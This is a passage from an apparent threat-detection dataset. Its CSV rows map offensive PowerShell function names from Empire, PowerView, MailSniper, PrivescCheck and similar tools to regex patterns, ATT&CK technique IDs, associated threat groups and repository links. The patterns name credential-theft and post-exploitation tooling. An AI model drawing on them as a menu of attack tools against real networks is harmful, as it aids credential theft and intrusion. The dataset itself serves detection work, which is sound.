XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 
- APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49783" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49784" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49785" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49786" "*Invoke-UserHunter*",".{0,1000}Invoke\-UserHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49787" "*invoke-userhunter*",".{0,1000}invoke\-userhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","49788" "*Invoke-UserImpersonation -Credential *",".{0,1000}Invoke\-UserImpersonation\s\-Credential\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","49790" "*Invoke-UserImpersonation -Credential * -Quiet*",".{0,1000}Invoke\-UserImpersonation\s\-Credential\s.{0,1000}\s\-Quiet.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49791" "*Invoke-UserImpersonation*",".{0,1000}Invoke\-UserImpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49792" "*Invoke-UserImpersonation*",".{0,1000}Invoke\-UserImpersonation.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49793" 
"*Invoke-UsernameHarvestEAS*",".{0,1000}Invoke\-UsernameHarvestEAS.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","49794" "*Invoke-UsernameHarvestEAS*",".{0,1000}Invoke\-UsernameHarvestEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49795" "*Invoke-UsernameHarvestGmail*",".{0,1000}Invoke\-UsernameHarvestGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49796" "*Invoke-UsernameHarvestOWA*",".{0,1000}Invoke\-UsernameHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49797" "*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49798" "*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49799" 
"*Invoke-UserRestrictedSidsCheck*",".{0,1000}Invoke\-UserRestrictedSidsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49800" "*Invoke-UserSessionListCheck*",".{0,1000}Invoke\-UserSessionListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49801" "*Invoke-UsersHomeFolderCheck*",".{0,1000}Invoke\-UsersHomeFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49802" "*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49803" "*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49804" "*Invoke-VaultListCheck*",".{0,1000}Invoke\-VaultListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49805" "*Invoke-VeeamGetCreds*",".{0,1000}Invoke\-VeeamGetCreds.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49806" "*Invoke-VeeamGetCreds*",".{0,1000}Invoke\-VeeamGetCreds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","49807" "*Invoke-Vnc*",".{0,1000}Invoke\-Vnc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - 
CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49808" "*Invoke-Vnc.ps1*",".{0,1000}Invoke\-Vnc\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE 
- Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49809" "*Invoke-VNCServer.ps1*",".{0,1000}Invoke\-VNCServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49810" "*Invoke-VNCViewer.ps1*",".{0,1000}Invoke\-VNCViewer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49811" "*Invoke-VoiceTroll.ps1*",".{0,1000}Invoke\-VoiceTroll\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49812" "*Invoke-Vulmap*",".{0,1000}Invoke\-Vulmap.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49813" "*Invoke-VulnerableADCSTemplates*",".{0,1000}Invoke\-VulnerableADCSTemplates.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49814" "*Invoke-Watson*",".{0,1000}Invoke\-Watson.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49815" "*Invoke-watson*",".{0,1000}Invoke\-watson.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - 
T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49816" "*Invoke-Watson.ps1*",".{0,1000}Invoke\-Watson\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 